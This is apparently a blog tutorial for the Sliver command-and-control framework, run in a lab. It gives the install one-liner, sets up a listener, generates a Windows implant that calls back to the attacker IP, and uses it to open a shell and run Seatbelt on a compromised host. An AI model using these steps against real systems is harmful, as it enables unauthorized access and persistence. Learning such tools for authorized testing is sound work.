Introduction
Sliver is a command and control (C2) open source and cross-platform framework released in 2020 by BishopFox. Developed to provide a robust alternative to traditional penetration testing tools, Sliver C2 offers a unique suite of capabilities that supports dynamic interaction with compromised systems. It is built to evade detection and includes features such as multi-platform support, encrypted communications, and the ability to generate modular implants
Download
In this post, I will use Kali Linux, but you can totally follow along if you use another Linux distro
From their GitHub repository, they provide a one-liner to install Sliver
$ curl https://sliver.sh/install | sudo bash
Confirm the installation was successful by running the command
$ sliver
If you have problems starting Sliver, you can restart it by running the command
$ sudo systemctl restart sliver
Then, try running Sliver again
Usage
Today, we will cover only the basic usage of Sliver. If you want more details or advanced features, you can check their documentation here
Setting up the listener
Here, 10.10.14.16 is my attacker IP
I created a listener on port 443. I recommend using common ports because there’s a better chance that the connection will be allowed by the firewall
sliver > mtls --lport 443
You can verify that your listener is running
sliver > jobs
Generating the Implant and using it
My target IP is 10.129.165.176
In my scenario, I have a reverse shell on my target by exploiting a service, but I will use Sliver to add persistence
First I generate the Implant, this will be an .exe file
sliver > generate --mtls 10.10.14.16:443 --os Windows --arch 64
Here you can see the Implant is generated on my Desktop folder as SIGNIFICANT_SUSPENDERS.EXE
I import into the target SIGNIFICANT_SUSPENDERS.EXE and run it
I get a connection back to sliver, by running sessions I can see the information and the ID
sliver > sessions
To interact with the implant use:
sliver > use <ID>
You can get more information about the commands you can use by running the help command
For example the command shell will give you an interactive shell
sliver (SIGNIFICANT_SUSPENDERS) > shell
You can run post exploitation tools such as Rubeus / SeatBelt and many others. You can see more at https://sliver.sh/docs?name=Armory
I will demonstrate for SeatBelt
sliver (SIGNIFICANT_SUSPENDERS) > armory install seatbelt
You can now use SeatBelt
sliver (SIGNIFICANT_SUSPENDERS) > seatbelt -group=all